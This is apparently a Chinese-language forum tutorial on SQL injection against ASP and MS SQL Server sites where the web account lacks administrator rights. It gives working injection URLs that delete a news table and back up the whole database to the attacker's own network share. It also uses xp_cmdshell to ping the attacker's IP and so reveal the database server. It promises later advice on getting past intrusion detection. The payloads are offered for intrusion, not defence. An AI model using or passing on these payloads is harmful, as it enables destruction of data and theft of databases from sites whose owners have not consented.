再说说当asp程序使用的sql账号不是管理员的时候我们该如何做。

假设有如下页面

http://www.xxxxx.com/news/news-2.asp?newid=117

大家可以试试看http://www.xxxxx.com/news/news-2.asp?newid=117;select 123;--

呵呵，报语法错误，select 123错误，显而易见，天融新的asp在newid变量后面用''号结束

那么试试看http://www.xxxxx.com/news/news-2.asp?newid=117'';delete news;--

哈哈，我想只要表名猜对了，新闻库就被删了

通常asp用的sql账号就算不是管理员也会是某个数据库的owner,至少对于这个库有很高的管理权限

但是我们不知道库名该怎么？看看db_name()函数吧

打开你的query analyzer，看看print db_name() ，呵呵，当前的数据库名就出来了

以次类推，如下： declare @a sysname;set @a=db_name();backup database @a to disk=''你的ip你的共享目录bak.dat'' ,name=''test'';--

呵呵，他的当前数据库就备份到你的硬盘上了，接下来要做的大家心里都明白了吧

同理这个方法可以找到对方的sql的ip

先装一个防火墙，打开icmp和139tcp和445tcp的警告提示

然后试试看news.asp?id=2;exec master.dbo.xp_cmdshell ''ping 你的ip''

如果防火墙提示有人ping你，那么因该可以肯定对方的asp用的是sql的管理员权限，同时也确定了对方的sql server的准确位置，因为很多大 一点的网站考虑性能，会把web服务和数据库分开，当对方大上了补丁看不到源代码时，我想只有这个方法能很快的定位对方的sql server的位置了

那么，如果对方asp没有sql管理员权限，我们就不能调用xp_cmdshell了，该怎么办？

别着急，试试看这个news.asp?id=2;declare @a;set @a=db_name();backup database @a to disk=''你的ip你的共享目录bak.dat'' ,name=''test'';--

呵呵，你的防火墙该发出警告了，有人连接你的445或139(win9端口了，这样，对方的sql的ip一样也可以暴露

那么如果对方连某个数据库的owner也不是的话，我们该怎么办？下次我会告诉大家一个更好的办法。

其实backuo database到你的硬盘还是有点夸张了，如果对方数据库很庞大，你又是拨号上网，呵呵，劝你别试了，很难成功传输的

稍后我们还会谈到如何骗过ids执行asp+sql入侵

目前有些好的ids已经开始监视xp_cmdshell这些关键字了